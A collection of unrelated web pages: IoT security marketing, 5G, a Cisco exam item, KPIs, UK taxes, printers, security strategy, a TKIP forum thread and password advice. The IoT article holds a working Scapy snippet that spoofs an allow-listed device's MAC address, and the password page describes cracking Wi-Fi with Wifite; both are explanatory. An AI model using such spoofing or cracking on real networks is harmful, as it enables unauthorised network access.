In the first half of 2021, there were 1.5 billion attacks on IoTs – more than double the previous year. IoTs make the ideal target for several reasons. Primarily, these devices collect data – a lot of it – and for cybercriminals, data means money. Critical infrastructure, specifically healthcare, collect the most valuable data, with healthcare information selling for almost three times as much as personal information on the dark web. In some instances, the targeted IoT possesses the sought-after data; in others, the connectivity of IoTs means a device acts as a gateway to valuable data.
Similarly, their connectivity means IoTs provide an access point to more critical systems; the compromised IoT is not always the intended target, but its accessibility makes it easier to infiltrate. For critical infrastructure, IoTs (or rather, Industrial IoTs (IIoTs) and Internet of Medical Things devices (IoMTs)) enable IT and OT convergence. As such, physical equipment is vulnerable to attacks originating in the IT domain, where the consequences are much more severe.
See no evil
A lack of Layer 1 visibility means security teams struggle to see which devices are operating in their infrastructure. Research finds that 75% of enterprises are experiencing a widening visibility gap in their IoT devices, a challenge not eased by the fact that IoT security projects fell by 16% in 2021. In short, enterprises do not actually know what their IoT devices are, and with the increasing number of IoTs in use, this is a significant problem.
One such challenge associated with a lack of visibility is that enterprises do not know the components of their IoTs, which are manufactured by different vendors. Raspberry Pis, which many IoTs and IoMTs rely on for operability, go undetected by existing security solutions yet are highly vulnerable to exploitation. One of our healthcare clients, when using our HAC-1 solution, discovered hundreds of Raspberry Pis embedded within their critical IoMTs, none of which had been detected by their existing security tools.
Additionally, IoTs, being non-802.1X compliant, get authenticated by alternative mechanisms, such as MAC Authentication Bypass (MAB) and MACsec, both of which rely on a device’s MAC address for authentication. However, MAC addresses are easily spoofed, and the gap in Layer 1 visibility means existing security solutions cannot differentiate between a legitimate and a spoofed MAC address. Bad actors know this and exploit the vulnerability with rogue devices that impersonate legitimate IoTs by spoofing their MAC addresses.
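To illustrate how low the bar is, a few lines of Scapy (a Python packet-crafting library) are enough to emit traffic carrying another device’s MAC address; the addresses and interface name below are placeholders rather than values from any real deployment:

from scapy.all import Ether, ARP, sendp

APPROVED_MAC = "00:11:22:33:44:55"  # MAC copied from an allow-listed IoT device

# A gratuitous ARP announcement sent with the borrowed MAC. To a check that
# trusts MAC addresses, this traffic appears to come from the approved device.
sendp(Ether(src=APPROVED_MAC)/ARP(hwsrc=APPROVED_MAC, psrc="10.0.0.50", pdst="10.0.0.50"), iface="eth0")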
Without complete visibility into their IoTs, enterprises lack the ability to properly enforce access policies and controls, such as Zero Trust and microsegmentation, a challenge that more than 60% of organizations face. Instead, access decisions are made based on incomplete or false (in the case of spoofing devices) information, unknowingly allowing vulnerable devices to operate on the same network segment as critical assets and providing rogue devices with access to the network.
Know your IoTs
The reliance on IoTs by critical infrastructure means there needs to be comprehensive and efficacious policy enforcement and security controls. Meeting such requirements starts with visibility – you can’t protect what you don’t know exists. Sepio’s HAC-1 solution provides a panacea to the gap in asset visibility by covering Layer 1, the physical layer. HAC-1 goes deeper than any other security solution, gathering Layer 1 data to bring complete visibility of all hardware assets, including IoTs. Every device gets detected for what it truly is, meaning vulnerable and malicious IoTs can no longer bypass security solutions and access controls. HAC-1’s Zero Trust Hardware Access approach enhances policy enforcement, ensuring that only authorized devices are granted access. The solution’s rogue device mitigation capability blocks unwanted, hidden, and rogue devices instantly, offering further protection against hardware-based threats.
Jessica Amado is Head of Cyber Research at Sepio, where she researches and covers multiple aspects of hardware-related cyber threats. She is a Regent’s University London graduate with First Class Honors in Global Business Management with Leadership and Management and holds an IDC Master’s in Government with a Specialization in Homeland Security and Counterterrorism. | <urn:uuid:261c5a07-7ccf-49b4-8847-3c48b4c593f5> | CC-MAIN-2024-38 | https://brilliancesecuritymagazine.com/cybersecurity/iots-know-a-lot-about-us-but-what-do-we-know-about-them/ | 2024-09-09T15:37:01Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00013.warc.gz | en | 0.946159 | 949 | 2.71875 | 3 |
Today, one of the most effective ways of processing and storing data is through a hybrid cloud model. Hybrid cloud utilizes robust servers for immediate data processing and video analytics at the edge and migrates data to the cloud for deep learning and archiving. When enterprises deploy on-premises storage connected to a private or public cloud, customers gain a foolproof solution that allows them to increase retention time and expand storage capacity as needed, while also reducing both capital expenditures and operational expenses.
When it comes to transferring video from endpoints, such as surveillance cameras, to servers at the edge or in centralized locations for storage, 5th generation (5G) wireless technology is positioned to be a game-changer. While 5G offers advantages for customers using the hybrid cloud model, such as improved video streaming and rapid download speeds accessing video from the cloud, there are also challenges, including cybersecurity risks, that clients will need to address.
The Capabilities of 5G
The 1980s saw 1G deliver analog telecommunications into the hands of eager buyers in the form of the first generation of wireless cellular technology. In the early 1990s, 2G built on that foundation, introducing functionality such as encrypted phone conversations, SMS text messages, and significantly more efficient use of the radio frequency spectrum. Throughout the early 2000s, 3G introduced mobile data to the world, while the 2010s ushered in 4G LTE, along with a new era of mobile broadband.
Today, 5G uses revolutionary OFDM (orthogonal frequency-division multiplexing) methods to modulate digital signals across several different channels, reducing interference and making 5G exponentially faster and more accessible than previous models. 5G also brings greater bandwidth by expanding the use of spectrum resources, super-powering mission-critical communications and IoT networks with ease. In fact, 5G has 100x the network capacity compared to 4G, allowing for millions of devices, sensors, and systems to be connected to the same network in a small area. For Smart Cities projects, which aggregate video and data from thousands of surveillance cameras, license plate readers and other sensors, 5G offers a tangible advantage.
Another defining benefit of 5G is that it delivers ultra-low latency and near real-time interactivity. This is ideal for security applications that require rapid installation where existing infrastructure is limited. Prime examples include outdoor concerts, festivals, and gatherings.
Challenges of 5G
For Smart City applications, ensuring video and data accessibility is key, which means choosing a reliable, enterprise-grade network. A key risk that a 5G network presents, however, is increased exposure to cyber-attacks. As a public network, 5G increases the number of penetration points and exposure to hackers. If threat actors gain access to a 5G network, they can disrupt it, access data on the network, and sabotage infrastructure connected to it. To mitigate these concerns, security manufacturers are building cyber defense protocols into devices that connect to 5G networks for heightened cyber protection.
5G and Hybrid Cloud
If a hybrid cloud model is powerful today using traditional broadband networks, introducing 5G will increase efficiency. Customers will be able to stream, review and access video from the cloud much faster. While 5G does offer lower latency for video transfer, in reality, this claim does not hold up without leveraging edge computing. Thus, for streamlined video recording, analysis and storage, customers should consider using a hybrid cloud model where video and data move from endpoints to servers at the edge, and lastly, to the cloud.
Just as 4G LTE ushered in a new era of mobile broadband, 5G is set to do the same. Experts anticipate that 5G will grow quickly: it is now available in 1,336 cities globally, a 350 percent increase over the past year, as reported by Viavi Solutions Inc. (VIAVI). 5G is also forecast to support “a wide range of industries and potentially enabling up to $13.1 trillion worth of goods and services,” according to Qualcomm’s 5G Economy study.
When designing video surveillance systems, customers who implement 5G network infrastructure and smart hybrid cloud storage models will set themselves up for success and experience better video performance. Clients who implement cyber protection best practices for the network, as well as network devices, will mitigate cyber threats. | <urn:uuid:8f1ea218-2f22-4497-a23c-7ed93a1ac647> | CC-MAIN-2024-38 | https://www.bcdvideo.com/blog/how-5g-will-improve-and-challenge-the-hybrid-cloud-model/ | 2024-09-09T14:17:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00013.warc.gz | en | 0.928713 | 880 | 2.71875 | 3 |
Refer to the exhibit. Users on the 172.17.22.0 network cannot reach the server located on the 172.31.5.0 network. The network administrator connected to router
Coffee via the console port, issued the show ip route command, and was able to ping the server.
Based on the output of the show ip route command and the topology shown in the graphic, what is the cause of the failure?
Correct Answer: C
The default (static) route was configured with an incorrect next-hop IP address, 172.19.22.2. The correct next-hop address to reach the server on the 172.31.5.0 network is 172.18.22.2, i.e.: ip route 0.0.0.0 0.0.0.0 172.18.22.2 | <urn:uuid:1caa6d3d-1de1-4b69-b1e0-da52a1da8b7c> | CC-MAIN-2024-38 | https://www.exam-answer.com/cisco/200-125/question541 | 2024-09-09T14:09:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00013.warc.gz | en | 0.934178 | 190 | 2.9375 | 3 |
Even though many organisations use the terms Key Performance Indicators (KPIs) and Key Risk Indicators (KRIs) interchangeably, they actually are two different tools with different purposes. Let’s take a look at what they are and how they are different.
Key Performance Indicators (KPI)
Key Performance Indicators (KPIs) are the gauges and measurements an organisation uses to understand how well individuals, business units, projects and companies are performing against their strategic goals.
Once an organisation has identified its strategic goals, KPIs serve as monitoring and decision-making tools that help answer your organisation’s key performance questions.
Key Risk Indicators (KRI)
Key Risk Indicators (KRIs), as the name suggests, measure risk. KRIs are used by organisations to determine how much risk they are exposed to or how risky a particular venture or activity is.
KRIs are a way to quantify and monitor the biggest risks an organisation (or activity) is exposed to. By measuring the risks and their potential impact on business performance, organisations are able to create early warning systems that allow them to monitor, manage and mitigate key risks.
Effective KRIs help to:
- Identify the biggest risks.
- Quantify those risks and their impact.
- Put risks into perspective by providing comparisons and benchmarks.
- Enable regular risk reporting and risk monitoring.
- Alert key people in advance of risks unfolding.
- Help people to manage and mitigate risks.
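As a toy illustration of the early-warning idea above, a KRI check ultimately reduces to comparing each indicator against agreed thresholds. The indicators and limits below are made-up examples, not recommendations:

# Hypothetical KRIs with illustrative warning and critical thresholds
kris = {
    "staff turnover (%)":      {"value": 14.0, "warn": 10.0, "critical": 18.0},
    "days since last DR test": {"value": 120,  "warn": 90,   "critical": 180},
}

for name, k in kris.items():
    if k["value"] >= k["critical"]:
        print("CRITICAL:", name, "=", k["value"])
    elif k["value"] >= k["warn"]:
        print("WARNING:", name, "=", k["value"], "- investigate before it escalates")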
The relationship between KPIs and KRIs
While KPIs help organisations understand how well they are doing in relation to their strategic plans, KRIs help them understand the risks involved and the likelihood of not delivering good outcomes in the future. This means KRIs can be the flipside of KPIs.
Here are three examples that illustrate this relationship:
- A company might establish a KPI to measure IT system performance and a complementary KRI to track IT vulnerability to cyberattacks.
- Perhaps a company creates a KPI to monitor its market share growth because that’s a key business objective. A KRI linked to the same goal could monitor the risks of losing market share due to customer shifts or new competition.
- A company might measure staff engagement or staff satisfaction as important KPIs and monitor the likelihood of losing key staff and the risks to their employer brand as KRIs.
So, in a nutshell:
KPIs and KRIs are not the same. KRIs help to quantify risks, while KPIs help to measure business performance.
Where to go from here:
How Do You Develop Key Risk Indicators (KRIs)? And How Do They Differ From KPIs?
What Is A Leading And A Lagging Indicator? And Why You Need To Understand The Difference | <urn:uuid:004f5966-3391-4100-a98d-2193ccc0f248> | CC-MAIN-2024-38 | https://bernardmarr.com/the-difference-between-a-kpi-and-kri/?paged1077=4 | 2024-09-10T18:18:46Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00813.warc.gz | en | 0.951711 | 584 | 2.640625 | 3 |
As government expenditure continues to swell, think tanks like the National Institute of Economic and Social Research and the Institute for Fiscal Studies warn of an unavoidable reality: tax hikes seem inevitable. To sustain and improve public services without compromising fiscal rules, future governments will have to navigate the tenuous balance between economic growth and additional revenue through taxation. This article explores the potential pathways and their implications for a society accustomed to relatively low taxation models.
The Case for Tax Hikes
The Economic Rationale
The economic rationale behind the impending tax increases is unambiguous. Public services, cherished by citizens and foundational to a functioning society, require adequate funding. The current American-style tax model in the UK, characterized by relatively lower tax rates, stands at odds with citizens’ aspirations for European-level services. The math is simple and unforgiving; the quality and scope of public services will inevitably fall without an influx of revenue. This has led economic experts to question not if, but how taxes will rise.
The Institute for Fiscal Studies articulates the need for tax hikes as a matter of arithmetic. Balancing budgets is not merely an exercise in political will but an economic necessity. With every passing year, the difficulty of adhering to this balancing act grows, especially in light of evolving demographics and increased demand for healthcare and pensions. Moreover, economic shocks such as recessions or pandemics only exacerbate the strain on government finances, leading to a more pressing need for action on the taxation front.
Political Palatability and Public Reception
Politically, tax increases are a minefield. Successive governments have shied away from direct tax hikes, opting instead for stealth methods like freezing income tax thresholds. These gradual changes, while initially less palpable, have started to raise public awareness and ire, diminishing their utility as a long-term solution. Moreover, the political narrative often revolves around ‘taxing the rich’—a strategy that fails to produce the necessary revenue due to the limited size of the affluent cohort.
The difficulty inherent in raising taxes is not simply a matter of public acceptance but also the effect on the economy. Tax hikes can dampen consumer spending, discourage investment, and exacerbate wealth inequality if not carefully designed. The challenge for policymakers is to devise tax increases that are neither economically detrimental nor politically unviable. Yet, as the fiscal demand grows, these political concerns may need to take a backseat to the practical reality of funding public services.
Potential Avenues for Taxation
Addressing Wealth and Corporate Taxes
Wealth taxes targeting the rich and corporate taxes have been touted as possible solutions to the looming fiscal challenges. However, they often fail to generate the required revenue. For instance, a 1p increment in the additional rate for high-income earners would fetch a paltry £157 million—insignificant in the grand scheme. Similarly, while corporate taxes are a potential goldmine, international competition and the need to attract business can limit the rates that governments are willing to impose.
The reality is that broad-based taxes are the financial workhorses of government programs. Taxes such as VAT and employer contributions to payroll taxes like National Insurance are robust and consistently reliable. While less targeted, increases to such taxes can prove more profitable and less discriminatory, laying a fairer tax burden across the economic spectrum. Yet, it is critical that any increases maintain a balance that does not disproportionately affect low-income earners or deter business development.
Incremental Changes in Broad-Based Taxes
Incremental changes in broad-based taxes like VAT or National Insurance could provide the answer for funding public services. These incremental shifts can spread the tax burden more evenly across the population, avoiding the pitfalls of targeting narrow tax bases. However, public reaction to such changes remains unpredictable, and the government must tread carefully to navigate the potential backlash from a public unaccustomed to significant tax adjustments. | <urn:uuid:8acb1fa2-301b-4bbe-bdae-40e7255daee9> | CC-MAIN-2024-38 | https://governmentcurated.com/economic-and-fiscal/is-a-tax-increase-inevitable-for-sustaining-public-services/ | 2024-09-11T22:29:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00713.warc.gz | en | 0.945028 | 783 | 2.546875 | 3 |
Laser vs Inkjet Printer: What is the difference between Inkjet and Laser printers?
Printers are essential accessories for both the home and the office, with laser and inkjet printers the typical choice for most businesses. Modern printers take care of all your printing needs with efficiency and ease. Deciding between a laser printer vs an inkjet is a vital decision.
Making the wrong choice can lead to decreased productivity and increased costs. These issues become acute for small businesses.
Below, we compare laser and inkjet printers based on various factors and their strengths to determine which is better for your business – a laser printer or an inkjet.
On this page:
What is a Laser Printer?
Perfect for printing vast volumes of documents, laser printers are generally used in office environments. Laser printers use powder toner to create a digital image on paper.
Laser printers are expensive and use toner cartridges but prove economical in the long run with low cost per page and fast print speeds.
Laser printers typically print at a high resolution of around 600 dots per inch (dpi).
What is an Inkjet Printer?
Inkjet printers, the most widely used type of printer, create digital images from a computer by spraying tiny ink droplets onto the paper.
These printers are available in several forms, from compact, affordable consumer models to more expensive professional versions.
They can be used to print text documents and colored images of high quality. Moreover, they are ideal for low-volume printing requirements.
Laser vs Inkjet Printer: How do inkjet printers and laser printers compare?
Several factors need to be considered when comparing the differences between laser printers and Inkjet printers. Factors such as application, page yield, print volume, and print speed will help determine the best choice for your organization.
Laser printers cater to corporate requirements, printing at roughly 15-100 pages per minute (ppm), while inkjet printers have a slower print speed of about 15 ppm. Because of this speed, laser printers can print more documents than inkjet printers and support a higher print volume per month.
The print volume measures how much a printer can print at a given time. A laser printer can print many documents and is ideal for office use. The print volume of an inkjet printer is low, considering its intended home use.
Most ink cartridges have an ink volume that can print anywhere between 135 and 1000 pages.
However, toner cartridges have a page yield ranging from 2,000 to 10,000. While a laser printer seems to have a higher page yield, inkjet printers with ink tanks offer a much higher ink volume and remove the need to repeatedly replace cartridges.
Some of the latest models of ink tank printers can print up to 6000 pages with one cartridge. However, such vast quantities of ink in an inkjet printer make sense only if you use it regularly. If you don’t want to keep replacing cartridges frequently but are not sure if you will print regularly, a laser color printer is a better option for you. Ink tank printers are suited for those who want to print many documents every day.
Talking about cost-effectiveness, there are two factors you should consider when comparing laser and inkjet printers. The first is the upfront investment which refers to the cost of the printer. The other cost is the maintenance of the printer.
Inkjet printers are cheaper to buy as they use simpler technology and require fewer resources to manufacture. Laser printers are more expensive to purchase as they involve more complex technology. A laser printer from a reputable brand generally costs about $200, which is quite costly for simple printing jobs.
Cost Per Page
The best way to evaluate the cost-efficiency of a printer is the cost per page. It comes down to how much you spend on the ink cartridges and toner. An inkjet printer’s ink is generally more expensive than the toner used in a laser printer.
Depending on the model, it costs between 5-10 cents to print a page in black on an inkjet printer. Printing in color costs more, about 15-25 cents per page.
The cost associated with a laser printer is generally less as the toner cartridges are cheaper. Printing a page in black costs no more than 5 cents regardless of the printer model. It costs less than 15 cents per page of color printing with a laser printer.
How do you identify an ink-efficient printer?
The printer's cost per page is used to determine ink efficiency and can be calculated as follows:
1. First, identify what ink cartridge the printer uses.
2. Find out the ink cartridge's page yield. This is the number of pages a cartridge can print before becoming empty. Higher page yield cartridges are more cost-efficient.
3. Divide the ink cartridge's price by the page yield. The result is the cost per page.
4. Cost per page = cartridge price / cartridge page yield

Looking for an inkjet printer with the lowest cost per page?
Although there are many factors to consider, many inkjet users praise the HP OfficeJet Pro 8035 All-in-One Printer, which produces black and white prints at around 4.9 cents per page and color prints at about 22 cents per page.

What is the cheapest cost per page laser printer?
With a cost per page of around 8 cents, the HP Color LaserJet Pro MFP M477fdw is considered a solid performer among multifunction color laser printers. This laser printer is a dependable workhorse suited for both office and home-office environments, operating at a reasonable printing cost. However, the lowest cost per page laser printer we found is the Brother Monochrome MFC-L2750DW, coming in at around 3.75 cents per page.
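If you prefer to script the comparison, here is a small Python sketch of the same arithmetic. The cartridge prices and page yields below are made-up placeholders, not real product quotes:

```python
def cost_per_page(cartridge_price: float, page_yield: int) -> float:
    """Cost per page = cartridge price / cartridge page yield."""
    return cartridge_price / page_yield

# Hypothetical cartridges (illustrative numbers only):
inkjet = cost_per_page(cartridge_price=25.00, page_yield=400)   # ~6.3 cents/page
laser = cost_per_page(cartridge_price=80.00, page_yield=2500)   # ~3.2 cents/page

print(f"Inkjet: {inkjet * 100:.1f} cents per page")
print(f"Laser:  {laser * 100:.1f} cents per page")
```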
Printer resolution is measured in dots per inch (dpi). A resolution of 600 dpi is good enough for quality text documents, while 1200 dpi produces good-looking color pictures.
While there is a belief that the higher the resolution, the sharper the print details, in reality, there is hardly any difference in the quality after 1200 dpi. When you want to print professional photographs, you need to think about resolution.
The maximum resolution of inkjet printers is about 5000 dpi. Laser printers generally have a resolution of about 2400×600 dpi though newer models optimize their specifications to provide high resolutions.
A common suggestion for a home office printer is an inkjet model that suits occasional printing. However, there are some issues like ink drying up with these printers. Therefore, it is recommended that you opt for an affordable laser printer instead; the toner used by these printers doesn’t dry up.
If you need high-resolution colored prints regularly and print a small volume of documents, an inkjet printer will do the job. Laser printers can print vast quantities of documents regularly.
A monochrome printer prints only in black and white and needs only a black cartridge to run. A monochrome laser printer is best if you have huge volumes of documents to handle daily. Though laser printers were originally built for office use, their economic benefits have recently made them popular as home printers.
Laser printers are ideal for everyday color printing, but a photo inkjet printer is better for professional photo printing in high quality. Photo inkjet printers are designed to produce detailed pictures with a tonal variety that artists and photographers expect. Several models of inkjet printers use pigment-based ink that works with a variety of art papers and paper sizes.
So, the choice of printer for color printing comes down to your requirements. A photo inkjet printer is a suitable option if you need to print professional-quality pictures. However, if you don’t have such demands for quality, depth, and tonal range, a color laser printer is a better choice as it allows printing more pages from a cartridge and does not dry up if left unused.
Laser printers, being more powerful, are usually larger than inkjet printers. However, several laser printer models from different brands are built to be similar in size to inkjet printers.
The difference in size between a laser and inkjet printer depends on the model you choose, but multi-functional laser printers are generally the biggest. An inkjet printer is the better option if you are looking for a small printer that fits a restricted area in a home office.
Laser vs Inkjet Printer: Advantages and Disadvantages
Let’s review the benefits and limitations of both types of printers. Knowing about the pros and cons of each helps determine the right choice for you.
Laser Printer Pros
- Offer faster printing speeds
- Regardless of the volume, printing is always smooth
- Produce sharp black texts ideal for office documents
- Better capable of handling high-volume jobs
- More cost-effective for simple prints
Laser Printer Cons
- Take more time to warm up
- Higher upfront cost
- Can’t handle a variety of paper
- Toner leaks are a trouble
- Generally bigger and heavier
- Not ideal for smooth pictures
Inkjet Printers Pros
- Ideal for graphics-heavy pictures and documents
- More affordable to buy
- Can handle a variety of paper and printing materials
- Better blending of smooth colors
- No warm-up time
- Cartridges can be refilled and reused
- Smaller, lighter, and easier to maintain
Inkjet Printer Cons
- Vulnerable to problems like smudging, fading, and water damage
- Cartridges require maintenance
- Slower than laser printers
- Generally have low capacity trays
- Output trays are not available in most cases
Original or compatible ink?
Compatible (or third-party) inks are unquestionably less expensive than OEM inks, but there are some drawbacks.
First, original inks are generally of higher quality than compatibles. Second, printer manufacturers frequently push "automatic upgrades"; when this occurs, compatible inks may no longer be recognised by your printer, leaving you with useless inks and a loss of money.
In addition, the guarantee may not be honoured by the manufacturer if you have been using inks that were not designed for your specific printer, so choose your ink wisely.
Whether you should get a laser or inkjet printer depends on what you want to print, the volume you need to handle, and the price you are willing to pay. Inkjet printers are generally more compact and affordable, and suited for image-heavy documents.
On the other hand, a laser printer is faster, more efficient, and economical when looking to print huge volumes of text documents.
Though laser printers require a higher upfront investment than inkjet printers, they have a lower cost per page and are more cost-effective in the long run. So, if you print many documents regularly, a laser printer can save you more. Replacing a toner cartridge also costs less in the long run than ink cartridges.
If you are after high volumes and speeds for business, a laser printer is a better choice. However, if you want something for occasional printing needs for your home, an inkjet printer is an ideal option. | <urn:uuid:4607a182-0ceb-4d90-9524-034fcbf48d4e> | CC-MAIN-2024-38 | https://www.businesstechweekly.com/productivity/document-imaging/laser-printer-inkjet/ | 2024-09-20T17:02:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00013.warc.gz | en | 0.919988 | 2,337 | 2.515625 | 3 |
Very few organizations have fully incorporated all relevant risks and threats into their current digital strategy, research finds.
Today, all organizations are digital by default. However, it has never been more difficult for organizations to map the digital environment in which they operate, or their interactions with it. Every organization's technology infrastructure is both custom-made and increasingly complex, spanning networks that consist of tools and technologies that may be on-premises or in the cloud — or, quite commonly, a combination of both.
Yet there is no reward without risk. Digital business inherently means utilizing new technology, connecting devices and operating platforms, embracing different ways of working, building large-scale data silos, and so on. The convergence of Internet of Things networks with what were once separate and self-contained — and therefore more manageable — systems represents a fundamental change.
The World Economic Forum now rates a large-scale cybersecurity breach as one of the five most serious risks facing the world today. The scale of the threat is expanding drastically: by 2021, the global cost of cybersecurity breaches will reach $6 trillion according to Cybersecurity Ventures' 2017 Cybercrime Report, double the total for 2015.
Spending Keeps Soaring
Coping with digital challenges and mitigating risks still represents a major burden for organizations across the board. To gain cyber resilience and combat cybercrime, organizations continue to increase their spending on cybersecurity. Of 1,200 C-suite leaders and other senior executives polled by EY for the 2017-18 Global Information Security Survey (GISS), 70% say they require up to 25% more funding, and the rest require even more than this. However, only 12% expect to receive an increase of more than 25%.
For many organizations, the worst may have to happen for these calls to be met. Asked what kind of event would result in cybersecurity budgets being increased, 76% of survey respondents said the discovery of a breach that caused damage would lead to greater resources being allocated.
By contrast, 64% said an attack that did not appear to have caused any harm would be unlikely to prompt an increase in the organization's cybersecurity budget. This is higher than the figure reported last year — which is concerning, given that an attack can cause harm that isn't immediately obvious.
The Threat Landscape Evolves at Lightning Speed
EY's survey shows that organizations are also increasingly fearful about the vulnerabilities within new channels and tools. For example, 77% of survey respondents worry about poor user awareness and behavior exposing them to risk via a mobile device; the loss of such a device and the potential for loss of information and an identity breach are a concern for 50%, according to EY's findings.
With so many disparate threats — and perpetrators that could be anyone from a rogue employee to a terrorist group or a nation-state — organizations must be vigilant across the board and be well acquainted with their own threat landscape. All the more so since attackers have easy access to malware and sophisticated tools — and can even hire cybercriminals — online.
Employees and criminal syndicates are seen as the greatest immediate threats. For many organizations, the most obvious point of weakness will come from an employee who is careless or fails to heed cybersecurity guidelines.
Organizations may feel more confident about confronting the types of attacks that have become familiar in recent years, but they still lack the capability to deal with more-advanced, targeted assaults. Overall, 68% of respondents have some form of formal incident response capability, but only 8% describe their plan as robust and spanning third parties and law enforcement.
To improve their chances of fighting back against cyberattackers, organizations will have to overcome the barriers that currently make it more difficult for cybersecurity operations to add value. For example, 59% of GISS respondents cite budget constraints, while a similar number lament a lack of skilled resources; 29% complain about a lack of executive awareness or support.
The so-called disconnect between cybersecurity and the C-suite still persists, with a mere 36% of corporate boards having sufficient cybersecurity knowledge for effective oversight of risk, as highlighted in the EY report. Ultimately, organizations that fail to obtain executive support and devote the resources necessary for adequate cybersecurity will find it very difficult to manage the risks they face.
The findings suggest organizations increasingly recognize this: 56% of respondents say either that they have made changes to their strategies and plans to take account of the risks posed by cyber threats, or that they are about to review strategy in this context. However, only 4% of organizations are confident they have fully considered the cybersecurity implications of their current strategy and incorporated all relevant risks and threats.
Due to their digital transformation, organizations inevitably expose themselves to greater cyber-risks and an ever-increasing dependency on their IT. Breaches and outages are on the rise. Although both have always been painful, the business impact is growing exponentially; if organizations are offline, revenue streams are cut off and reputation is at risk. With security incidents continuing to rise, it is clear that attackers are finding new sources of profit even as companies prioritize the protection of their digital assets.
Many businesses have increased investments in security, but these investments often follow an approach that utilizes technology to build a defense. Increasingly, firms will realize that they must also detect the inevitable breaches and respond quickly.
Beyond the technical aspects, organizations will also begin building business processes that enhance security, and they will implement end-user training to mitigate human error. In short, companies must shift their security mindset from technology-based defenses to proactive steps that include technology, process, and education. There is no doubt that companies are taking security more seriously, but now they must realize that modern security demands a different mentality rather than just more of the same.
First appeared on DARKReading | <urn:uuid:9e122342-f847-4682-8b3e-6639c1bdb777> | CC-MAIN-2024-38 | https://resources.experfy.com/iot/modern-cybersecurity-demands-a-different-corporate-mindset/ | 2024-09-08T12:26:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00213.warc.gz | en | 0.961177 | 1,171 | 2.515625 | 3 |
In the CWSP book on page 391, it is mentioned that "the IV has a third byte component that is used in addition to TSC0 and 1 to help prevent creation of weak IVs and to create the 24bit IV length".
Which one of the remaining four bytes is the third byte: TSC2, TSC3, TSC4, or TSC5?
The third byte of the 24 bit sequence is actually an 8-bit value that helps prevent the resulting IV from being "weak." Some resources will list this as a Dummy Byte value, but the intent is to ensure that the combination of TSC0, TSC1, and this byte result in a non-weak IV value.
where does this third byte come from?
The "third byte" is the WEP seed described in d) below.
IEEE 802.11, TKIP overview:
"The TKIP is a cipher suite enhancing the WEP protocol on pre-RSNA hardware. TKIP modifies WEP as follows:
"a) A transmitter calculates a keyed cryptographic message integrity code (MIC) over the MSDU SA and DA, the MSDU priority (see 126.96.36.199), and the MSDU plaintext data. TKIP appends the computed MIC to the MSDU data prior to fragmentation into MPDUs. The receiver verifies the MIC after decryption, ICV checking, and defragmentation of the MPDUs into an MSDU and discards any received MSDUs with invalid MICs. TKIP?¡é?€??s MIC provides a defense against forgery attacks.
"b) Because of the design constraints of the TKIP MIC, it is still possible for an adversary to compromise message integrity; therefore, TKIP also implements countermeasures. The countermeasures bound the probability of a successful forgery and the amount of information an attacker can learn about a key.
"c) TKIP uses a per-MPDU TKIP sequence counter (TSC) to sequence the MPDUs it sends. The receiver drops MPDUs received out of order, i.e., not received with increasing sequence numbers. This provides replay protection. TKIP encodes the TSC value from the sender to the receiver as a WEP IV and extended IV.
"d) TKIP uses a cryptographic mixing function to combine a temporal key, the TA, and the TSC into the WEP seed. The receiver recovers the TSC from a received MPDU and utilizes the mixing function to compute the same WEP seed needed to correctly decrypt the MPDU. The key mixing function is designed to defeat weak-key attacks against the WEP key."
I hope this helps. Can you add your location to your forum profile? Thanks. /criss - | <urn:uuid:058d4ca7-1627-4b39-806a-56c696b9268d> | CC-MAIN-2024-38 | https://www.cwnp.com/forums/posts?postNum=298661 | 2024-09-14T13:27:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00613.warc.gz | en | 0.900675 | 602 | 2.65625 | 3 |
Having a strong password for every application you use is crucial, as hackers can decipher basic passwords in minutes. A recent demonstration by an engineer showed how simple it is to break into an account protected by a weak password. In a short, three-minute YouTube video, it took the engineer just 2 minutes and 28 seconds to brute-force the password "superman," giving him complete access to the wireless connection.
What steps were used to brute-force the password?
The engineer installed Kali NetHunter on his Android phone and launched a tool called Wifite. He then selected a wireless connection and used Wifite to automate discovering, cracking, and logging into the network. The tool surfaced information including the device's MAC address, the wireless network's SSID, and, ultimately, the network's password (encryption key). In a matter of minutes, the password "superman" was successfully guessed.
Here is the 3-minute YouTube short showing how the white-hat hacker did it.
This is only one way hackers can attack your systems. Follow these password guidelines to prevent hackers from accessing your personal data.
- Infiniwiz warns against reusing the same password across the websites you use. If your password is ever stolen and you reuse it, hackers will have no trouble accessing your accounts on other websites.
- Passwords should have a minimum of 12 characters and include upper/lower case letters, digits, and special characters. While 9-10 characters should be enough today, processing rates at least double every year, allowing hackers to "brute force" passwords faster. Choosing 12 characters will ensure you don't have to repeat the same exercise in five years (see the sketch after this list).
- Remembering complex passwords without duplicating them is impossible, so use password management software like 1password.com.
- A word preceded or followed by a single number should also be avoided (e.g., Password1). Hackers will try guessing your password using word lists and popular passwords.
- Avoid using details in your password that could be known about you or found in your social media accounts (such as birthdays, the names of family members, hobbies, etc.).
- Avoid using a predictable system to derive passwords from the vendor or site name. For example, if you're creating a password for Amazon.com, making the password a1m1a1z1o1n1 will not help you.
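To see why the 12-character recommendation matters, here is a rough back-of-the-envelope Python sketch. The guess rate is an assumed figure for a well-resourced offline attacker, and real attacks using dictionaries and leaked password lists are far more efficient than pure brute force:

```python
def brute_force_years(length: int, alphabet: int = 94,
                      guesses_per_second: float = 1e10) -> float:
    """Worst-case years to try every password of a given length.

    94 is roughly the printable ASCII character set; the guess rate
    is an assumption and will keep growing as hardware improves.
    """
    seconds = alphabet ** length / guesses_per_second
    return seconds / (3600 * 24 * 365)

for n in (8, 10, 12):
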